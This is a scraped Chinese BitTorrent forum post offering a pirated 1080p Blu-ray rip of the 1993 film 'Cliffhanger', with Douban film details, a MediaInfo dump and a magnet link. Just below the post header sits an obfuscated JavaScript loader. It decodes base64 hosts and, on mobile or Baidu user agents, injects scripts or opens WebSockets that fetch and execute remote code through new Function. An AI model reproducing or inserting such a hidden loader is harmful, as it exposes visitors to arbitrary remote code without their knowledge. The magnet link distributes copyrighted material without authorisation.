绝岭雄风[简繁字幕].Cliffhanger.1993.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-迅雷下载 9.70GB

版主小s 23天前 192

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 绝岭雄风/巅峰战士(台)

◎片 名 Cliffhanger

◎年 代 1993

◎产 地 美国,意大利,法国

◎类 别 动作 / 惊悚 / 冒险

◎语 言 英语

◎上映日期 1993-05-20(戛纳电影节) / 1993-05-28(美国)

◎豆瓣评分 7.6/10 from 7352 users

◎豆瓣链接 https://movie.douban.com/subject/1293952/

◎片 长 112 分钟

◎导 演 雷尼·哈林 Renny Harlin

◎编 剧 迈克尔·弗朗斯 Michael France / 西尔维斯特·史泰龙 Sylvester Stallone

◎主 演 西尔维斯特·史泰龙 Sylvester Stallone

约翰·利思戈 John Lithgow

迈克尔·鲁克 Michael Rooker

简宁·特纳 Janine Turner

瑞克斯·林恩 Rex Linn

卡罗琳·古多尔 Caroline Goodall

里昂·罗宾逊 Leon Robinson

克雷格·法布拉斯 Craig Fairbrass

乔治·斯科特·柯民思 Gregory Scott Cummins

丹尼斯·弗雷斯特 Denis Forest

Max Perlich Max Perlich

保罗·温菲尔德 Paul Winfield

拉尔夫·韦特 Ralph Waite

扎克·格雷尼尔 Zach Grenier

维托·鲁吉尼斯 Vyto Ruginis

唐·戴维斯 Don S. Davis

斯科特·霍斯比 Scott Hoxby

约翰·芬 John Finn

布鲁斯·麦克吉尔 Bruce McGill

萝丝玛丽·邓斯莫尔 Rosemary Dunsmore

Michael Weis Michael Weis

Billy D. Lucas Billy D. Lucas

◎标 签 动作 | 史泰龙 | 美国 | 冒险 | 登山 | 1993 | 美国电影 | 绝岭雄风

◎简 介

加贝(西尔维斯特·史泰龙 Sylvester Stallone 饰)是一名高山抢险队队员,对于他来说,不断的征服一座又一座看似高不可攀的山巅就是人生的全部意义所在。然而,在一次行动中,由于加贝的疏忽导致了朋友意外坠山而亡,心中充满了愧疚与悔恨的他决心就此放弃攀登。

一次偶然中,加贝接收到了一个神秘的求救信号,信号的发出地位于雪岭之巅,和朋友哈尔(迈克尔·鲁克 Michael Rooker 饰)、杰西(简宁·特纳 Janine Turner 饰)一起,加贝决心到那里一探究竟。让加贝没有想到的是,在雪岭等待着他的,竟然是一帮穷凶极恶的劫匪和一群手无寸铁的人质。比环境更险恶的,是人心,这一次,加贝能否逢凶化吉呢?

◎获奖情况

第66届奥斯卡金像奖 ?(1994)

最佳视觉效果(提名) 尼尔·克雷佩拉?/?约翰·理查森?/?约翰·布鲁诺?/?帕米拉·伊斯利

最佳音效剪辑(提名) 华利·史帝文?/?格雷格·巴克斯特

最佳音响(提名) 迈克尔·明克勒?/?鲍勃·贝默尔?/?蒂姆·库尼

第17届日本电影学院奖 ?(1994)

最佳外语片(提名)

  1. General

  2. Unique ID : 11535924925683895055124302516213670521 (0x8ADBD02DEF8F1CF4C934EFCF6766279)

  3. Complete name : Cliffhanger.1993.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.70 GiB

  7. Duration : 1 h 52 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 12.3 Mb/s

  10. Encoded date : UTC 2021-07-01 03:34:32

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 52 min

  20. Bit rate : 7 620 kb/s

  21. Width : 1 920 pixels

  22. Height : 796 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.208

  30. Stream size : 6.00 GiB (62%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 7620 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x796 / interlace=0 / total-frames=162144 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 52 min

  48. Bit rate mode : Variable

  49. Bit rate : 4 369 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 24 bits

  55. Compression mode : Lossless

  56. Stream size : 3.44 GiB (35%)

  57. Title : English DTS-HD Master Audio 5.1 @ 4366 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 52 min

  68. Bit rate mode : Constant

  69. Bit rate : 192 kb/s

  70. Channel(s) : 2 channels

  71. Channel layout : L R

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 155 MiB (2%)

  76. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary

  77. Language : English

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Text #1

  82. ID : 4

  83. Format : PGS

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 42 min

  87. Bit rate : 26.9 kb/s

  88. Count of elements : 2102

  89. Stream size : 19.8 MiB (0%)

  90. Title : Eng/SUP

  91. Language : English

  92. Default : No

  93. Forced : No


  94. Text #2

  95. ID : 5

  96. Format : PGS

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 44 min

  100. Bit rate : 21.5 kb/s

  101. Count of elements : 2419

  102. Stream size : 16.0 MiB (0%)

  103. Title : Eng/SUP SDH

  104. Language : English

  105. Default : No

  106. Forced : No


  107. Text #3

  108. ID : 6

  109. Format : PGS

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 43 min

  113. Bit rate : 29.5 kb/s

  114. Count of elements : 2574

  115. Stream size : 21.9 MiB (0%)

  116. Title : Chs/SUP 简体

  117. Language : Chinese

  118. Default : No

  119. Forced : No


  120. Text #4

  121. ID : 7

  122. Format : PGS

  123. Codec ID : S_HDMV/PGS

  124. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  125. Duration : 1 h 43 min

  126. Bit rate : 30.2 kb/s

  127. Count of elements : 2574

  128. Stream size : 22.4 MiB (0%)

  129. Title : Cht/SUP 繁体

  130. Language : Chinese

  131. Default : No

  132. Forced : No


  133. Text #5

  134. ID : 8

  135. Format : PGS

  136. Codec ID : S_HDMV/PGS

  137. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  138. Duration : 1 h 43 min

  139. Bit rate : 20.0 kb/s

  140. Count of elements : 2574

  141. Stream size : 14.8 MiB (0%)

  142. Title : Chs/SUP 简体

  143. Language : Chinese

  144. Default : Yes

  145. Forced : No


  146. Text #6

  147. ID : 9

  148. Format : PGS

  149. Codec ID : S_HDMV/PGS

  150. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  151. Duration : 1 h 43 min

  152. Bit rate : 20.9 kb/s

  153. Count of elements : 2574

  154. Stream size : 15.5 MiB (0%)

  155. Title : Cht/SUP 繁体

  156. Language : Chinese

  157. Default : No

  158. Forced : No


  159. Menu

  160. 00:00:00.000 : en:第 01 章

  161. 00:06:06.657 : en:第 02 章

  162. 00:13:24.804 : en:第 03 章

  163. 00:22:48.617 : en:第 04 章

  164. 00:27:15.508 : en:第 05 章

  165. 00:34:28.357 : en:第 06 章

  166. 00:40:27.007 : en:第 07 章

  167. 00:49:08.028 : en:第 08 章

  168. 00:55:17.564 : en:第 09 章

  169. 01:03:35.812 : en:第 10 章

  170. 01:11:08.305 : en:第 11 章

  171. 01:18:27.869 : en:第 12 章

  172. 01:26:01.489 : en:第 13 章

  173. 01:32:17.865 : en:第 14 章

  174. 01:35:32.768 : en:第 15 章

  175. 01:41:54.149 : en:第 16 章


TAGS 动作 冒险 惊悚

磁力链:
  • magnet:?xt=urn:btih:021778956A03B7538CFDAF1406A7E78D1935F4D2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回